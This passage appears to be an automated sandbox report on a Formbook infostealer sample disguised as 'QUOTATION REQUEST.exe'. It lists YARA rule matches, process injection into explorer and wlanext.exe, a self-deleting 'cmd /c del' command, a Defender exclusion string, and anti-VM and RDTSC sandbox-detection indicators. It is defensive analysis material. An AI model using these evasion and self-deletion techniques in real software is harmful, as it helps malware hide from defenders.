Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C1D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F0D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C25DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BD466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EECB85
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB4A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB4A3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED8C5D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC58C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED2D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEBD74
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EECF94

Source: C:\Windows\SysWOW64\wlanext.exe

Code function: String function: 035FB150 appears 45 times

Source: QUOTATION REQUEST.exe, 00000000.00000002.233827964.00000000059E0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.227364139.00000000002E8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000000.224914371.0000000000CF8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269766089.0000000001A52000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe	Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe

Source: QUOTATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: QUOTATION REQUEST.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@15/6

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01

Source: QUOTATION REQUEST.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: QUOTATION REQUEST.exe	Virustotal: Detection: 18%
Source: QUOTATION REQUEST.exe	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: QUOTATION REQUEST.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION REQUEST.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source:	Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 0_2_002394E5 push cs; iretd
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C93F pushad ; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041C9F4 push 1B579E0Eh; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00415249 push ebx; iretd
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_004152D2 push 59027665h; retf
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00413348 push ds; iretd
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B3B5 push eax; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0040D441 push EB161335h; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B46C push eax; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B402 push eax; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B40B push eax; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B499 push eax; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_0041B499 push eax; ret
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 3_2_00C494E5 push cs; iretd
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0364D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC9F4 push 1B579E0Eh; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEC93F pushad ; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE52D2 push 59027665h; retf
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE5249 push ebx; iretd
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB3B5 push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EE3348 push ds; iretd
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB499 push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB499 push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB46C push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EDD441 push EB161335h; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB40B push eax; ret
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_00EEB402 push eax; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.93143837904

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION REQUEST.exe PID: 4660, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000000ED85E4 second address: 0000000000ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000000ED897E second address: 0000000000ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Code function: 3_2_004088B0 rdtsc

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 5296	Thread sleep time: -103583s >= -30000s
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 3440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4156	Thread sleep time: -70000s >= -30000s
Source: C:\Windows\SysWOW64\wlanext.exe TID: 4644	Thread sleep time: -52000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread delayed: delay time: 103583
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.252971907.0000000008907000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000005.00000000.256483067.000000000F540000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.249430731.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000002.494643012.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.250059832.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.241452030.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.248911750.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
